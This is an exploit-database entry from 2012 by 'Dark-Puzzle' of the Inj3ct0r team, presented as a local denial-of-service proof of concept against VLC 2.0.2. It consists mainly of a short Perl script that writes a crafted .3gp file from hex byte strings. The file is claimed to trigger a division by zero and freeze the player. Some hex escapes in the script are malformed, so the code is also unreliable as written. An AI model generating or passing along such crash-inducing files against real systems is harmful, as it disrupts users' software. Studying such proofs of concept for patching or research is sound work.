1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 ========================================== 1 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0 0 1 1 dark-puzzle[at]live[at]fr 0 0 ========================================== 1 1 Pentesting/exploit coding/bug research 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 # Exploit Title: VLC 2.0.2 - .3gp Division By Zero. # Author: Dark-Puzzle . # Danger : Medium . # Category :Local Exploit . # Version: Latest ; 2.0.2 Twoflower (Previous versions are not tested but Maybe Vulnerable) # Vendor : www.videolan.org # Software Link : http://www.videolan.org/vlc/releases/2.0.2.html # Date: 02 Aug 2012 . ---------------------------------------------------------------------------------------- The division by zero occurs a non-response from all playlist DLLs so you cannot play nothing until you close VLC through the Task Manager ---------------------------------------------------------------------------------------- PoC : #!/usr/bin/perl my $a ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; my $b ="\x00\x00\x00\xnn\x66\x74\x79\x70\x33\x67\x70"; my $c ="\x62\x6\x74\x77\x65\x65\x6e\x20\x74\x68\x65\x20\x68\x65\x61\x64\x65\x72\x20\x61 \x6e\x64\x20\x74\x68\x65\x20\x66\x6f\x6f\x74\x65\x72\x20\x74\x68\x65\x72\x65\x27 \x73\x20\x64\x61\x72\x6b\x2d\x70\x75\x7a\x7a\x6c\x65"; my $d ="\x33\x67\x70"; my $file = "darkpuzzle.3gp"; open ($File, ">$file"); print $File $a,$b,$c,$d; close ($File); ----------------------------------------------------------------------------------------- * Dark-Puzzle From Datasec Team * Greetz 2 : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstromsecurity.org